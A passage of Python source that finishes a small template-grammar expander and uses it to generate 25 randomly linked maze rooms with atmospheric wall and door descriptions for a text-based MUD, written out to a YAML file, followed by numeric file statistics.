                        buffer = ''
                    else:
                        raise Exception( "Grammar.parse: no such rule '" + buffer + "'." )
                else:
                    buffer += char
            if buffer != '':
                fragments += [ buffer ]
            return "".join( fragments )
        else:
            # Fast path: no brackets at all, nothing to expand.
            return string

    def rule( self, rule, new = None ):
        """With *new*, (re)define rule *rule*; otherwise return its current
        alternatives, or None if it is not defined."""
        # Fixed: compare against None instead of truthiness, so a rule can
        # be set to an empty list of alternatives (previously 'rule(r, [])'
        # silently fell through to a lookup).
        if new is not None:
            self.rules[rule] = new
        else:
            return self.rules.get( rule )
# Grammar that generates maze-room descriptions. 'walls' is the main entry
# rule; 'door', 'doorMat' and 'hidden' describe the exit, with '[!door]'
# used by the caller to save the chosen door word for reuse.
wallMaker = Grammar({
    # Materials the walls can be made of.
    'wallMat': [ 'stone', 'rock', 'wood', 'paper', 'earth', 'crystal', 'leafy vagueness', 'sand', 'skin', 'bark', 'foliage', 'needles', 'delicate tiles', 'agate', 'quartz', 'glass', 'iron', 'copper' ],
    # Adjectives for the walls' condition/appearance.
    'wallCond': [ 'dark', 'heavy', 'slick', 'moss-clung', 'twisted', 'fluted', 'greenish', 'dark', 'hot', 'lumpy', 'unsteady', 'slippery', 'geometrically flanged', 'sigil-eaten', 'consuming', 'blue', 'reddish', 'translucent', 'ultramarine', 'sky-blue', 'delicate pink', 'fuligin' ],
    # Sentence templates combining the rules above into a room description.
    'walls': [ 'walls of [wallMat] close in; the way is [width].',
        '[wallCond] walls of [wallMat] close in.',
        'the walls are [wallCond] [wallMat]... the tunnels, [width].',
        'all around, [wallCond] [wallMat].',
        'all around, [wallMat].',
        'there\'s [wallMat] everywhere here.',
        'there\'s [wallMat] everywhere here. it\'s [wallCond].',
        '[wallCond] [wallMat] all around.',
        'the walls are made of [wallMat] here.',
        'this place is built entirely of [wallMat].',
        'it\'s very [wallCond] here.',
        '[width], [wallCond].',
        '[wallMat].',
        '[wallCond].'],
    # How roomy the passage feels.
    'width': [ 'suffocatingly close', 'echoing', 'massive', 'wide', 'barely large enough to pass crawling', 'thin and straight', 'tall and narrow', 'tiny', 'spacious', 'vast' ],
    # Kinds of exits, their materials, and how conspicuous they are.
    'door': [ 'door', 'hatch', 'gate', 'opening', 'incision', 'grating', 'well', 'oubliette', 'tunnel', 'arch' ],
    'doorMat': [ 'rock', 'oaken', 'papery', 'crystal', 'glass', 'iron', 'silver' ],
    'hidden': [ 'half-hidden', 'in plain view', 'almost impossible to spot', 'staring you in the face', 'which can only be found by touch' ]
})
if __name__ == '__main__':
    # Exit-name triples "display;match;abbreviation", consumed via NAME below.
    linkNames = [ "[N]orth;north;n", "[S]outh;south;s", "[E]ast;east;e", "[W]est;west;w", "[U]p;up;u" ]
    project = { "projectName": "maze", "rooms": { } }
    roomCount = 25
    for i in range(0, roomCount):
        # Generate the room description; '[!door]' saves the chosen door word
        # so the exit messages below can mention the very same door.
        desc = wallMaker.parse("[walls]\n\na [doorMat] [!door], [hidden].")
        door = wallMaker.saved.pop( )
        ID = "room-" + str(i)
        project["rooms"][ ID ] = { "NAME": "Maze" }
        project["rooms"][ ID ][ "LINKS" ] = { }
        project["rooms"][ ID ][ "_/de" ] = desc
        project["rooms"][ ID ][ "POSTSCRIPT" ] = { "BUILD": [ "@set here=D", "@tel here=#63" ] }
        # Each room shall have 2-3 links to other random rooms. Don't try to be consistent.
        ln = linkNames.copy( )
        random.shuffle(ln)
        # Fixed: the inner loop previously reused 'i', shadowing the room index.
        # Harmless only because 'i' was not read again afterwards; a distinct
        # name removes the trap. A repeated random target simply overwrites
        # the earlier link, so a room may end up with fewer links than drawn.
        for _ in range( 0, random.choice([ 2, 3, 3, 3, 3, 4, 4, 4 ]) ):
            target = "room-" + str( random.choice( range(0, roomCount) ) )
            project["rooms"][ ID ][ "LINKS" ][ target ] = {
                "NAME": ln.pop( ),
                "succ": "You force your way through the " + door + ".",
                "osucc": "forces their way through the " + door + ".",
                "odrop": "emerges through an obscure way from some other part of the maze." }
    with open("maze.gen.yaml", "w") as fh:
        fh.write( yaml.dump( project ) )
    print( "write: maze.gen.yaml (probably.)" )
| 35.531915
| 282
| 0.48982
| 525
| 5,010
| 4.634286
| 0.48
| 0.025894
| 0.028771
| 0.032059
| 0.079737
| 0.019729
| 0
| 0
| 0
| 0
| 0
| 0.005464
| 0.342515
| 5,010
| 140
| 283
| 35.785714
| 0.733151
| 0.048104
| 0
| 0.134831
| 0
| 0
| 0.326329
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033708
| false
| 0.011236
| 0.022472
| 0
| 0.11236
| 0.011236
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|